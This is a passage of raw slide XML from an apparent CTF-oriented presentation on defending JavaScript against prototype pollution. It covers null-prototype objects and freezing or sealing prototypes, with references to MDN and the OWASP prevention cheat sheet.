                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>-prototype objects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</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setPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>({}, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="93A1A1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// not recommended, sets prototype to `null` after creation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ __proto__: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="93A1A1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// unlike accessing the `__proto__` property after object creation, this way of setting the prototype in the object initializer is in the ECMAScript standard, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="93A1A1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Object_initializer#prototype_setter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="93A1A1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; it is a bit ugly though</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E69E565-3CC5-7B1E-B766-37EBF988EE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6994026" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37722191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1B4E-B8F0-622B-38CF-BC3605DC40B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>-prototype objects 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04F9005-A7D6-E440-7127-BE47E32ADCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>An additional advantage is that it is likely compatible with most existing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>As mentioned before, the disadvantage is that are missing some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> instance methods [1]; this might break some existing code assuming the existence of those methods (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> throws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TypeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The above two are also irrelevant for CTF players</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1506014-5DB7-0130-F939-965C3F7760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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E69E565-3CC5-7B1E-B766-37EBF988EE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928007"/>
            <a:ext cx="6434807" cy="21544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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#instance_methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10829974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6ED38-2B00-6EBF-F10B-650A1684887A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Freezing prototypes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55A4D99-BCA0-7E3C-FE37-F13A9BF9E334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>freeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] makes an object immutable (not deep immutable though) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2] makes new properties un-addable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Both makes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> property (internal slot) immutable (not the prototype object itself)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>If you freeze the prototypes instead, then nothing happens when you try to pollute the prototypes [3]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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.seal</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.prototype.hand</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.prototype.hand</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the property fails to be added</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>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.prototype.constructor</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.prototype.constructor</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can still change existing properties</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.freeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> prototype] {}</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.prototype.constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"hidden knife"</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'hidden knife'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.prototype.constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// the prototype is (shallow) immutable now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'knife'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46EAE4CA-CE50-9C98-4D1A-B84EEF9F36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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47C494C-8F4A-3163-A390-46E7A115DB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4681835"/>
            <a:ext cx="7201845" cy="461665"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/seal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39707442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3BE4-C0A7-A273-6F88-1C44AE147481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Freezing prototypes 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
